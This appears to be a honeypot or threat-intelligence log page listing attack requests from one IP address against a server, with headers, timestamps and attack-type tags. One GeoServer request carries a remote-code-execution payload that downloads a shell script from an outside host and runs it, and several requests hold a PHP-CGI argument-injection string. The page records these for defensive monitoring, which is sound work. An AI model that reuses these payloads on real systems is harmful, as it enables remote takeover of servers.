Requests from 83.222.191.62

Remote Address

Threat Level

Method

Path

Query String

Headers

Body

Acceptable

Timestamp

Port

Request Types

Attack Types

Analyse Request

Other Requests by Actor

CSV Dump

83.222.191.62

GET

/containers/json

Header	Value
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-23 00:59:05.716509

OTHER

83.222.191.62

POST

/geoserver/wfs

Header	Value
Content-Type	application/xml
Content-Length	385
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-22 22:02:08.107249

OTHER

83.222.191.62

POST

/geoserver/wfs

Header	Value
Content-Type	application/xml
Content-Length	381
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-22 21:55:38.650037

OTHER

83.222.191.62

GET

/containers/json

Header	Value
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-22 01:43:19.209202

OTHER

83.222.191.62

POST

/geoserver/wfs

Header	Value
Content-Type	application/xml
Content-Length	385
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-21 22:44:14.364457

OTHER

83.222.191.62

POST

/geoserver/wfs

Header	Value
Content-Type	application/xml
Content-Length	381
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-21 22:23:28.939423

OTHER

83.222.191.62

GET

/geoserver/wfs

service=wfs&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),"cd /tmp; curl http://154.216.18.19/geo -o g.sh || wget http://154.216.18.19/geo -O g.sh; chmod +x g.sh; ./g.sh")

Header	Value
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-09-19 00:36:37.698588

ATTACK
SCAN
RECON

RCE
LFI
RFI

83.222.191.62

POST

/webtools/control/forgotPassword;/ProgramExport

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	147
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-28 22:36:04.487553

OTHER

83.222.191.62

POST

/webtools/control/forgotPassword;/ProgramExport

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	147
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:80
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-28 20:33:57.595124

OTHER

83.222.191.62

POST

/hello.world

%ADd allow_url_include=1 %ADd auto_prepend_file=php://input=

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	164
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:80
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-19 05:29:02.451383

ATTACK
SCAN
RECON

WEBAPP_VULN
RCE
LFI

83.222.191.62

POST

/hello.world

%ADd allow_url_include=1 %ADd auto_prepend_file=php://input=

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	164
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-19 00:50:52.583269

ATTACK
SCAN
RECON

WEBAPP_VULN
RCE
LFI

83.222.191.62

POST

/hello.world

%ADd allow_url_include=1 %ADd auto_prepend_file=php://input=

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	166
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:80
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-11 04:42:52.832138

ATTACK
SCAN
RECON

WEBAPP_VULN
RCE
LFI

83.222.191.62

POST

/hello.world

%ADd allow_url_include=1 %ADd auto_prepend_file=php://input=

Header	Value
Content-Type	application/x-www-form-urlencoded
Content-Length	166
User-Agent	Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host	188.245.40.243:443
Accept	/
Upgrade-Insecure-Requests	1
Connection	keep-alive

Parameter	Value

False

2024-07-11 01:35:02.072041

ATTACK
SCAN
RECON

WEBAPP_VULN
RCE
LFI